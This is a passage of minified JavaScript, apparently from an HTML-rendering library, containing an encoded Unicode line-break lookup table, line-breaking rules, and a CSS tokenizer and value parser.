AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAB4AHgAeAB4AHgAeAB4AHgAeACsAKwBLAEsASwBLAEsASwBLAEsASwBLAEsASwBLAEsASwBLAEsASwBLAEsASwBLAEsASwBLAEsASwBLAEsASwBLAEsASwBLAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAeAB4AHgAeAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAeAB4AHgAeAB4AHgAeAB4ABAAeAB4AHgAeAB4AHgAeAB4AHgAeAAQAHgAeAA0ADQANAA0AHgArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwAEAAQABAAEAAQAKwAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArAAQABAAEAAQABAAEAAQAKwAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAKwArAAQABAAEAAQABAAEAAQAKwAEAAQAKwAEAAQABAAEAAQAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAArACsAKwAEAAQABAAEAAQABAAEAFAAUABQAFAAUABQAFAAKwArAEsASwBLAEsASwBLAEsASwBLAEsAKwArACsAKwBQAB4AKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUAAEAAQABAAEAEsASwBLAEsASwBLAEsASwBLAEsAKwArACsAKwArABsAUABQAFAAUABQACsAKwBQAFAAUABQAFAAUABQAFAAUAAEAAQABAAEAAQABAAEACsAKwArACsAKwArACsAKwArAB4AHgAeAB4ABAAEAAQABAAEAAQABABQACsAKwArACsASwBLAEsASwBLAEsASwBLAEsASwArACsAKwArABYAFgArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAGgBQAFAAUAAaAFAAUABQAFAAKwArACsAKwArACsAKwArACsAKwArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAAeAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQACsAKwBQAFAAUABQACsAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAKwBQAFAAKwBQACsAKwBQACsAUABQAFAAUABQAFAAUABQAFAAUAArAFAAUABQAFAAKwBQACsAUAArACsAKwArACsAKwBQACsAKwArACsAUAArAFAAKwBQACsAUABQAFAAKwBQAFAAKwBQACsAKwBQACsAUAArAFAAKwBQACsAUAArAFAAUAArAFAAKwArAFAAUABQAFAAKwBQAFAAUABQAFAAUABQACsAUABQAFAAUAArAFAAUABQAFAAKwBQACsAUABQAFAAUABQAFAAUABQAFAAUAArAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAArACsAKwArACsAUABQAFAAKwBQAFAAUABQAFAAKwBQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwAeAB4AKwArACsAKwArACsAKwArACsAKwArACsAKwArAE8ATwBPAE8ATwBPAE8ATwBPAE8ATwBPAE8AJQAlACUAHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHgAeAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB4AHgAeACUAJQAlAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAdAB0AHQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQApACkAKQApACkAKQApACkAKQApACkAKQApACkAKQApACkAKQApACkAKQApACkAKQApACkAJQAlACUAJQAlACAAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAeAB4AJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlAB4AHgAlACUAJQAlACUAHgAlACUAJQAlACUAIAAgACAAJQAlACAAJQAlACAAIAAgACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACEAIQAhACEAIQAlACUAIAAgACUAJQAgACAAIAAgACAAIAAgACAAIAAgACAAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJQAlACUAIAAlACUAJQAlACAAIAAgACUAIAAgACAAJQAlACUAJQAlACUAJQAgACUAIAAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAHgAlAB4AJQAeACUAJQAlACUAJQAgACUAJQAlACUAHgAlAB4AHgAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlAB4AHgAeAB4AHgAeAB4AJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAeAB4AHgAeAB4AHgAeAB4AHgAeACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACAAIAAlACUAJQAlACAAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACAAJQAlACUAJQAgACAAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAHgAeAB4AHgAeAB4AHgAeACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAeAB4AHgAeAB4AHgAlACUAJQAlACUAJQAlACAAIAAgACUAJQAlACAAIAAgACAAIAAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeABcAFwAXABUAFQAVAB4AHgAeAB4AJQAlACUAIAAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACAAIAAgACUAJQAlACUAJQAlACUAJQAlACAAJQAlACUAJQAlACUAJQAlACUAJQAlACAAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AJQAlACUAJQAlACUAJQAlACUAJQAlACUAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AJQAlACUAJQAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeACUAJQAlACUAJQAlACUAJQAeAB4AHgAeAB4AHgAeAB4AHgAeACUAJQAlACUAJQAlAB4AHgAeAB4AHgAeAB4AHgAlACUAJQAlACUAJQAlACUAHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAgACUAJQAgACUAJQAlACUAJQAlACUAJQAgACAAIAAgACAAIAAgACAAJQAlACUAJQAlACUAIAAlACUAJQAlACUAJQAlACUAJQAgACAAIAAgACAAIAAgACAAIAAgACUAJQAgACAAIAAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAgACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACAAIAAlACAAIAAlACAAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAgACAAIAAlACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJQAlAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AKwAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArAEsASwBLAEsASwBLAEsASwBLAEsAKwArACsAKwArACsAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAKwArAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXACUAJQBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwAlACUAJQAlACUAJQAlACUAJQAlACUAVwBXACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQBXAFcAVwBXAFcAVwBXAFcAVwBXAFcAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAJQAlACUAKwAEACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArACsAKwArAA=="),_e=Array.isArray(ge)?function(fe){for(var ce=fe.length,ge=[],_e=0;_e<ce;_e+=4)ge.push(fe[_e+3]<<24|fe[_e+2]<<16|fe[_e+1]<<8|fe[_e]);return ge}(ge):new Uint32Array(ge),je=Array.isArray(ge)?function(fe){for(var ce=fe.length,ge=[],_e=0;_e<ce;_e+=2)ge.push(fe[_e+1]<<8|fe[_e]);return ge}(ge):new Uint16Array(ge),dt=X(je,12,_e[4]/2),_t=2===_e[5]?X(je,(24+_e[4])/2):function(fe,ce,ge){return fe.slice?fe.slice(ce,ge):new Uint32Array(Array.prototype.slice.call(fe,ce,ge))}(_e,Math.ceil((24+_e[4])/4)),new R(_e[0],_e[1],_e[2],_e[3],dt,_t)),Qt=[Wi,36],ei=[1,2,3,5],$o=[me,8],ai=[xt,st],$t=ei.concat($o),zo=[qt,Qn,Kt,Jt,Gt],Ut=[ht,Ge],ha=function(fe,ce,ge,_e){var je=_e[ge];if(Array.isArray(fe)?-1!==fe.indexOf(je):fe===je)for(var tt=ge;tt<=_e.length;){if((dt=_e[++tt])===ce)return!0;if(dt!==me)break}if(je===me)for(tt=ge;tt>0;){var _t=_e[--tt];if(Array.isArray(fe)?-1!==fe.indexOf(_t):fe===_t)for(var gt=ge;gt<=_e.length;){var dt;if((dt=_e[++gt])===ce)return!0;if(dt!==me)break}if(_t!==me)break}return!1},Ha=function(fe,ce){for(var ge=fe;ge>=0;){var _e=ce[ge];if(_e!==me)return _e;ge--}return 0},Va=function(fe,ce,ge,_e,je){if(0===ge[_e])return Pt;var tt=_e-1;if(Array.isArray(je)&&!0===je[tt])return Pt;var dt=tt-1,_t=tt+1,gt=ce[tt],kt=dt>=0?ce[dt]:0,Lt=ce[_t];if(2===gt&&3===Lt)return Pt;if(-1!==ei.indexOf(gt))return"!";if(-1!==ei.indexOf(Lt)||-1!==$o.indexOf(Lt))return Pt;if(8===Ha(tt,ce))return"\xf7";if(11===Ho.get(fe[tt])||(gt===zt||gt===pa)&&11===Ho.get(fe[_t])||7===gt||7===Lt||9===gt||-1===[me,Ge,ht].indexOf(gt)&&9===Lt||-1!==[lt,ft,xe,Le,pt].indexOf(Lt)||Ha(tt,ce)===Oe||ha(23,Oe,tt,ce)||ha([lt,ft],Je,tt,ce)||ha(12,12,tt,ce))return Pt;if(gt===me)return"\xf7";if(23===gt||23===Lt)return Pt;if(16===Lt||16===gt)return"\xf7";if(-1!==[Ge,ht,Je].indexOf(Lt)||14===gt||36===kt&&-1!==Ut.indexOf(gt)||gt===pt&&36===Lt||Lt===We||-1!==Qt.indexOf(Lt)&&gt===$e||-1!==Qt.indexOf(gt)&&Lt===$e||gt===xt&&-1!==[jt,zt,pa].indexOf(Lt)||-1!==[jt,zt,pa].indexOf(gt)&&Lt===st||-1!==Qt.indexOf(gt)&&-1!==ai.indexOf(Lt)||-1!==ai.indexOf(gt)&&-1!==Qt.indexOf(Lt)||-1!==[xt,st].indexOf(gt)&&(Lt===$e||-1!==[Oe,ht].indexOf(Lt)&&ce[_t+1]===$e)||-1!==[Oe,ht].indexOf(gt)&&Lt===$e||gt===$e&&-1!==[$e,pt,Le].indexOf(Lt))return Pt;if(-1!==[$e,pt,Le,lt,ft].indexOf(Lt))for(var Ht=tt;Ht>=0;){if((ui=ce[Ht])===$e)return Pt;if(-1===[pt,Le].indexOf(ui))break;Ht--}if(-1!==[xt,st].indexOf(Lt))for(Ht=-1!==[lt,ft].indexOf(gt)?dt:tt;Ht>=0;){var ui;if((ui=ce[Ht])===$e)return Pt;if(-1===[pt,Le].indexOf(ui))break;Ht--}if(qt===gt&&-1!==[qt,Qn,Jt,Gt].indexOf(Lt)||-1!==[Qn,Jt].indexOf(gt)&&-1!==[Qn,Kt].indexOf(Lt)||-1!==[Kt,Gt].indexOf(gt)&&Lt===Kt||-1!==zo.indexOf(gt)&&-1!==[We,st].indexOf(Lt)||-1!==zo.indexOf(Lt)&&gt===xt||-1!==Qt.indexOf(gt)&&-1!==Qt.indexOf(Lt)||gt===Le&&-1!==Qt.indexOf(Lt)||-1!==Qt.concat($e).indexOf(gt)&&Lt===Oe&&-1===ii.indexOf(fe[_t])||-1!==Qt.concat($e).indexOf(Lt)&&gt===ft)return Pt;if(41===gt&&41===Lt){for(var Ki=ge[tt],Ni=1;Ki>0&&41===ce[--Ki];)Ni++;if(Ni%2!=0)return Pt}return gt===zt&&Lt===pa?Pt:"\xf7"},co=function(fe,ce){ce||(ce={lineBreak:"normal",wordBreak:"normal"});var ge=function(fe,ce){void 0===ce&&(ce="strict");var ge=[],_e=[],je=[];return fe.forEach(function(tt,dt){var _t=Ho.get(tt);if(_t>50?(je.push(!0),_t-=50):je.push(!1),-1!==["normal","auto","loose"].indexOf(ce)&&-1!==[8208,8211,12316,12448].indexOf(tt))return _e.push(dt),ge.push(16);if(4===_t||11===_t){if(0===dt)return _e.push(dt),ge.push(Wi);var gt=ge[dt-1];return-1===$t.indexOf(gt)?(_e.push(_e[dt-1]),ge.push(gt)):(_e.push(dt),ge.push(Wi))}return _e.push(dt),31===_t?ge.push("strict"===ce?Je:jt):_t===Bo||29===_t?ge.push(Wi):43===_t?ge.push(tt>=131072&&tt<=196605||tt>=196608&&tt<=262141?jt:Wi):void ge.push(_t)}),[_e,ge,je]}(fe,ce.lineBreak),_e=ge[0],je=ge[1],tt=ge[2];return("break-all"===ce.wordBreak||"break-word"===ce.wordBreak)&&(je=je.map(function(_t){return-1!==[$e,Wi,Bo].indexOf(_t)?jt:_t})),[_e,je,"keep-all"===ce.wordBreak?tt.map(function(_t,gt){return _t&&fe[gt]>=19968&&fe[gt]<=40959}):void 0]},io=function(){function fe(ce,ge,_e,je){this.codePoints=ce,this.required="!"===ge,this.start=_e,this.end=je}return fe.prototype.slice=function(){return g.apply(void 0,this.codePoints.slice(this.start,this.end))},fe}(),ls=function(fe){return fe>=48&&fe<=57},Ll=function(fe){return ls(fe)||fe>=65&&fe<=70||fe>=97&&fe<=102},Vm=function(fe){return 10===fe||9===fe||32===fe},vf=function(fe){return function(fe){return function(fe){return fe>=97&&fe<=122}(fe)||function(fe){return fe>=65&&fe<=90}(fe)}(fe)||function(fe){return fe>=128}(fe)||95===fe},Bs=function(fe){return vf(fe)||ls(fe)||45===fe},Jp=function(fe){return fe>=0&&fe<=8||11===fe||fe>=14&&fe<=31||127===fe},od=function(fe,ce){return 92===fe&&10!==ce},Pc=function(fe,ce,ge){return 45===fe?vf(ce)||od(ce,ge):!!vf(fe)||!(92!==fe||!od(fe,ce))},ec=function(fe,ce,ge){return 43===fe||45===fe?!!ls(ce)||46===ce&&ls(ge):ls(46===fe?ce:fe)},V2=function(fe){var ce=0,ge=1;(43===fe[ce]||45===fe[ce])&&(45===fe[ce]&&(ge=-1),ce++);for(var _e=[];ls(fe[ce]);)_e.push(fe[ce++]);var je=_e.length?parseInt(g.apply(void 0,_e),10):0;46===fe[ce]&&ce++;for(var tt=[];ls(fe[ce]);)tt.push(fe[ce++]);var dt=tt.length,_t=dt?parseInt(g.apply(void 0,tt),10):0;(69===fe[ce]||101===fe[ce])&&ce++;var gt=1;(43===fe[ce]||45===fe[ce])&&(45===fe[ce]&&(gt=-1),ce++);for(var kt=[];ls(fe[ce]);)kt.push(fe[ce++]);var Lt=kt.length?parseInt(g.apply(void 0,kt),10):0;return ge*(je+_t*Math.pow(10,-dt))*Math.pow(10,gt*Lt)},kM={type:2},dc={type:3},vo={type:4},Zp={type:13},B2={type:8},Ud={type:21},Xn={type:9},Af={type:10},e_={type:11},t_={type:12},n0={type:14},mc={type:23},qd={type:1},H2={type:25},Wt={type:24},Ds={type:26},o0={type:27},i_={type:28},yi={type:29},r0={type:31},Uu={type:32},Ot=function(){function fe(){this._value=[]}return fe.prototype.write=function(ce){this._value=this._value.concat(E(ce))},fe.prototype.read=function(){for(var ce=[],ge=this.consumeToken();ge!==Uu;)ce.push(ge),ge=this.consumeToken();return ce},fe.prototype.consumeToken=function(){var ce=this.consumeCodePoint();switch(ce){case 34:return this.consumeStringToken(34);case 35:var ge=this.peekCodePoint(0),_e=this.peekCodePoint(1),je=this.peekCodePoint(2);if(Bs(ge)||od(_e,je)){var tt=Pc(ge,_e,je)?2:1;return{type:5,value:this.consumeName(),flags:tt}}break;case 36:if(61===this.peekCodePoint(0))return this.consumeCodePoint(),Zp;break;case 39:return this.consumeStringToken(39);case 40:return kM;case 41:return dc;case 42:if(61===this.peekCodePoint(0))return this.consumeCodePoint(),n0;break;case 43:if(ec(ce,this.peekCodePoint(0),this.peekCodePoint(1)))return this.reconsumeCodePoint(ce),this.consumeNumericToken();break;case 44:return vo;case 45:var _t=ce,gt=this.peekCodePoint(0),kt=this.peekCodePoint(1);if(ec(_t,gt,kt))return this.reconsumeCodePoint(ce),this.consumeNumericToken();if(Pc(_t,gt,kt))return this.reconsumeCodePoint(ce),this.consumeIdentLikeToken();if(45===gt&&62===kt)return this.consumeCodePoint(),this.consumeCodePoint(),Wt;break;case 46:if(ec(ce,this.peekCodePoint(0),this.peekCodePoint(1)))return this.reconsumeCodePoint(ce),this.consumeNumericToken();break;case 47:if(42===this.peekCodePoint(0))for(this.consumeCodePoint();;){var Lt=this.consumeCodePoint();if(42===Lt&&47===(Lt=this.consumeCodePoint()))return this.consumeToken();if(-1===Lt)return this.consumeToken()}break;case 58:return Ds;case 59:return o0;case 60:if(33===this.peekCodePoint(0)&&45===this.peekCodePoint(1)&&45===this.peekCodePoint(2))return this.consumeCodePoint(),this.consumeCodePoint(),H2;break;case 64:var Ht=this.peekCodePoint(0),ui=this.peekCodePoint(1),Ki=this.peekCodePoint(2);if(Pc(Ht,ui,Ki))return{type:7,value:this.consumeName()};break;case 91:return i_;case 92:if(od(ce,this.peekCodePoint(0)))return this.reconsumeCodePoint(ce),this.consumeIdentLikeToken();break;case 93:return yi;case 61:if(61===this.peekCodePoint(0))return this.consumeCodePoint(),B2;break;case 123:return e_;case 125:return t_;case 117:case 85:var Ni=this.peekCodePoint(0),Ui=this.peekCodePoint(1);return 43===Ni&&(Ll(Ui)||63===Ui)&&(this.consumeCodePoint(),this.consumeUnicodeRangeToken()),this.reconsumeCodePoint(ce),this.consumeIdentLikeToken();case 124:if(61===this.peekCodePoint(0))return this.consumeCodePoint(),Xn;if(124===this.peekCodePoint(0))return this.consumeCodePoint(),Ud;break;case 126:if(61===this.peekCodePoint(0))return this.consumeCodePoint(),Af;break;case-1:return Uu}return Vm(ce)?(this.consumeWhiteSpace(),r0):ls(ce)?(this.reconsumeCodePoint(ce),this.consumeNumericToken()):vf(ce)?(this.reconsumeCodePoint(ce),this.consumeIdentLikeToken()):{type:6,value:g(ce)}},fe.prototype.consumeCodePoint=function(){var ce=this._value.shift();return void 0===ce?-1:ce},fe.prototype.reconsumeCodePoint=function(ce){this._value.unshift(ce)},fe.prototype.peekCodePoint=function(ce){return ce>=this._value.length?-1:this._value[ce]},fe.prototype.consumeUnicodeRangeToken=function(){for(var ce=[],ge=this.consumeCodePoint();Ll(ge)&&ce.length<6;)ce.push(ge),ge=this.consumeCodePoint();for(var _e=!1;63===ge&&ce.length<6;)ce.push(ge),ge=this.consumeCodePoint(),_e=!0;if(_e)return{type:30,start:parseInt(g.apply(void 0,ce.map(function(gt){return 63===gt?48:gt})),16),end:parseInt(g.apply(void 0,ce.map(function(gt){return 63===gt?70:gt})),16)};var dt=parseInt(g.apply(void 0,ce),16);if(45===this.peekCodePoint(0)&&Ll(this.peekCodePoint(1))){this.consumeCodePoint(),ge=this.consumeCodePoint();for(var _t=[];Ll(ge)&&_t.length<6;)_t.push(ge),ge=this.consumeCodePoint();return{type:30,start:dt,end:parseInt(g.apply(void 0,_t),16)}}return{type:30,start:dt,end:dt}},fe.prototype.consumeIdentLikeToken=function(){var ce=this.consumeName();return"url"===ce.toLowerCase()&&40===this.peekCodePoint(0)?(this.consumeCodePoint(),this.consumeUrlToken()):40===this.peekCodePoint(0)?(this.consumeCodePoint(),{type:19,value:ce}):{type:20,value:ce}},fe.prototype.consumeUrlToken=function(){var ce=[];if(this.consumeWhiteSpace(),-1===this.peekCodePoint(0))return{type:22,value:""};var ge=this.peekCodePoint(0);if(39===ge||34===ge){var _e=this.consumeStringToken(this.consumeCodePoint());return 0===_e.type&&(this.consumeWhiteSpace(),-1===this.peekCodePoint(0)||41===this.peekCodePoint(0))?(this.consumeCodePoint(),{type:22,value:_e.value}):(this.consumeBadUrlRemnants(),mc)}for(;;){var je=this.consumeCodePoint();if(-1===je||41===je)return{type:22,value:g.apply(void 0,ce)};if(Vm(je))return this.consumeWhiteSpace(),-1===this.peekCodePoint(0)||41===this.peekCodePoint(0)?(this.consumeCodePoint(),{type:22,value:g.apply(void 0,ce)}):(this.consumeBadUrlRemnants(),mc);if(34===je||39===je||40===je||Jp(je))return this.consumeBadUrlRemnants(),mc;if(92===je){if(!od(je,this.peekCodePoint(0)))return this.consumeBadUrlRemnants(),mc;ce.push(this.consumeEscapedCodePoint())}else ce.push(je)}},fe.prototype.consumeWhiteSpace=function(){for(;Vm(this.peekCodePoint(0));)this.consumeCodePoint()},fe.prototype.consumeBadUrlRemnants=function(){for(;;){var ce=this.consumeCodePoint();if(41===ce||-1===ce)return;od(ce,this.peekCodePoint(0))&&this.consumeEscapedCodePoint()}},fe.prototype.consumeStringSlice=function(ce){for(var _e="";ce>0;){var je=Math.min(5e4,ce);_e+=g.apply(void 0,this._value.splice(0,je)),ce-=je}return this._value.shift(),_e},fe.prototype.consumeStringToken=function(ce){for(var ge="",_e=0;;){var je=this._value[_e];if(-1===je||void 0===je||je===ce)return{type:0,value:ge+=this.consumeStringSlice(_e)};if(10===je)return this._value.splice(0,_e),qd;if(92===je){var tt=this._value[_e+1];-1!==tt&&void 0!==tt&&(10===tt?(ge+=this.consumeStringSlice(_e),_e=-1,this._value.shift()):od(je,tt)&&(ge+=this.consumeStringSlice(_e),ge+=g(this.consumeEscapedCodePoint()),_e=-1))}_e++}},fe.prototype.consumeNumber=function(){var ce=[],ge=4,_e=this.peekCodePoint(0);for((43===_e||45===_e)&&ce.push(this.consumeCodePoint());ls(this.peekCodePoint(0));)ce.push(this.consumeCodePoint());_e=this.peekCodePoint(0);var je=this.peekCodePoint(1);if(46===_e&&ls(je))for(ce.push(this.consumeCodePoint(),this.consumeCodePoint()),ge=8;ls(this.peekCodePoint(0));)ce.push(this.consumeCodePoint());_e=this.peekCodePoint(0),je=this.peekCodePoint(1);var tt=this.peekCodePoint(2);if((69===_e||101===_e)&&((43===je||45===je)&&ls(tt)||ls(je)))for(ce.push(this.consumeCodePoint(),this.consumeCodePoint()),ge=8;ls(this.peekCodePoint(0));)ce.push(this.consumeCodePoint());return[V2(ce),ge]},fe.prototype.consumeNumericToken=function(){var ce=this.consumeNumber(),ge=ce[0],_e=ce[1],je=this.peekCodePoint(0),tt=this.peekCodePoint(1),dt=this.peekCodePoint(2);return Pc(je,tt,dt)?{type:15,number:ge,flags:_e,unit:this.consumeName()}:37===je?(this.consumeCodePoint(),{type:16,number:ge,flags:_e}):{type:17,number:ge,flags:_e}},fe.prototype.consumeEscapedCodePoint=function(){var ce=this.consumeCodePoint();if(Ll(ce)){for(var ge=g(ce);Ll(this.peekCodePoint(0))&&ge.length<6;)ge+=g(this.consumeCodePoint());Vm(this.peekCodePoint(0))&&this.consumeCodePoint();var _e=parseInt(ge,16);return 0===_e||function(fe){return fe>=55296&&fe<=57343}(_e)||_e>1114111?65533:_e}return-1===ce?65533:ce},fe.prototype.consumeName=function(){for(var ce="";;){var ge=this.consumeCodePoint();if(Bs(ge))ce+=g(ge);else{if(!od(ge,this.peekCodePoint(0)))return this.reconsumeCodePoint(ge),ce;ce+=g(this.consumeEscapedCodePoint())}}},fe}(),Fr=function(){function fe(ce){this._tokens=ce}return fe.create=function(ce){var ge=new Ot;return ge.write(ce),new fe(ge.read())},fe.parseValue=function(ce){return fe.create(ce).parseComponentValue()},fe.parseValues=function(ce){return fe.create(ce).parseComponentValues()},fe.prototype.parseComponentValue=function(){for(var ce=this.consumeToken();31===ce.type;)ce=this.consumeToken();if(32===ce.type)throw new SyntaxError("Error parsing CSS component value, unexpected EOF");this.reconsumeToken(ce);var ge=this.consumeComponentValue();do{ce=this.consumeToken()}while(31===ce.type);if(32===ce.type)return ge;throw new SyntaxError("Error parsing CSS component value, multiple values found when expecting only one")},fe.prototype.parseComponentValues=function(){for(var ce=[];;){var ge=this.consumeComponentValue();if(32===ge.type)return ce;ce.push(ge),ce.push()}},fe.prototype.consumeComponentValue=function(){var ce=this.consumeToken();switch(ce.type){case 11:case 28:case 2:return this.consumeSimpleBlock(ce.type);case 19:return this.consumeFunction(ce)}return ce},fe.prototype.consumeSimpleBlock=function(ce){for(var ge={type:ce,values:[]},_e=this.consumeToken();;){if(32===_e.type||qu(_e,ce))return ge;this.reconsumeToken(_e),ge.values.push(this.consumeComponentValue()),_e=this.consumeToken()}},fe.prototype.consumeFunction=function(ce){for(var ge={name:ce.value,values:[],type:18};;){var _e=this.consumeToken();if(32===_e.type||3===_e.type)return ge;this.reconsumeToken(_e),ge.values.push(this.consumeComponentValue())}},fe.prototype.consumeToken=function(){var ce=this._tokens.shift();return void 0===ce?Uu:ce},fe.prototype.reconsumeToken=function(ce){this._tokens.unshift(ce)},fe}(),Un=function(fe){return 15===fe.type},ur=function(fe){return 17===fe.type},tn=function(fe){return 20===fe.type},zl=function(fe){return 0===fe.type},ds=function(fe,ce){return tn(fe)&&fe.value===ce},Bm=function(fe){return 31!==fe.type},Wl=function(fe){return 31!==fe.type&&4!==fe.type},xs=function(fe){var ce=[],ge=[];return fe.forEach(function(_e){if(4===_e.type){if(0===ge.length)throw new Error("Error parsing function args, zero tokens for arg");return ce.push(ge),void(ge=[])}31!==_e.type&&ge.push(_e)}),ge.length&&ce.push(ge),ce},qu=function(fe,ce){return 11===ce&&12===fe.type||28===ce&&29===fe.type||2===ce&&3===fe.type},ws=function(fe){return 17===fe.type||15===fe.type},In=function(fe){return 16===fe.type||ws(fe)},a_=function(fe){return fe.length>1?[fe[0],fe[1]]:[fe[0]]},xo={type:17,number:0,flags:4},Vi={type:16,number:50,flags:4},Ia={type:16,number:100,flags:4},wo=function(fe,ce,ge){var _e=fe[0],je=fe[1];return[_n(_e,ce),_n(void 0!==je?je:_e,ge)]},_n=function(fe,ce){if(16===fe.type)return fe.number/100*ce;if(Un(fe))switch(fe.unit){case"rem":case"em":return 16*fe.number;default:return fe.number}return fe.number},Bl_parse=function(fe,ce){if(15===ce.type)switch(ce.unit){case"deg":return Math.PI*ce.number/180;case"grad":return Math.PI/200*ce.number;case"rad":return ce.number;case"turn":return 2*Math.PI*ce.number}throw new Error("Unsupported angle type")},tc=function(fe){return 15===fe.type&&("deg"===fe.unit||"grad"===fe.unit||"rad"===fe.unit||"turn"===fe.unit)},$a=function(fe){switch(fe.filter(tn).map(function(ge){return ge.value}).join(" ")){case"to bottom right":case"to right bottom":case"left top":case"top left":return[xo,xo];case"to top":case"bottom":return ms(0);case"to bottom left":case"to left bottom":case"right top":case"top right":return[xo,Ia];case"to right":case"left":return ms(90);case"to top left":case"to left top":case"right bottom":case"bottom right":return[Ia,Ia];case"to bottom":case"top":return ms(180);case"to top right":case"to right top":case"left bottom":case"bottom left":return[Ia,xo];case"to left":case"right":return ms(270)}return 0},ms=function(fe){return Math.PI*fe/180},Hs_parse=function(fe,ce){if(18===ce.type){var ge=Hm[ce.name];if(void 0===ge)throw new Error('Attempting to parse an unsupported color function "'+ce.name+'"');return ge(fe,ce.values)}if(5===ce.type){if(3===ce.value.length){var _e=ce.value.substring(0,1),je=ce.value.substring(1,2),tt=ce.value.substring(2,3);return ko(parseInt(_e+_e,16),parseInt(je+je,16),parseInt(tt+tt,16),1)}if(4===ce.value.length){_e=ce.value.substring(0,1),je=ce.value.substring(1,2),tt=ce.value.substring(2,3);var dt=ce.value.substring(3,4);return ko(parseInt(_e+_e,16),parseInt(je+je,16),parseInt(tt+tt,16),parseInt(dt+dt,16)/255)}if(6===ce.value.length)return _e=ce.value.substring(0,2),je=ce.value.substring(2,4),tt=ce.value.substring(4,6),ko(parseInt(_e,16),parseInt(je,16),parseInt(tt,16),1);if(8===ce.value.length)return _e=ce.value.substring(0,2),je=ce.value.substring(2,4),tt=ce.value.substring(4,6),dt=ce.value.substring(6,8),ko(parseInt(_e,16),parseInt(je,16),parseInt(tt,16),parseInt(dt,16)/255)}if(20===ce.type){var _t=Nc[ce.value.toUpperCase()];if(void 0!==_t)return _t}return Nc.TRANSPARENT},Oc=function(fe){return 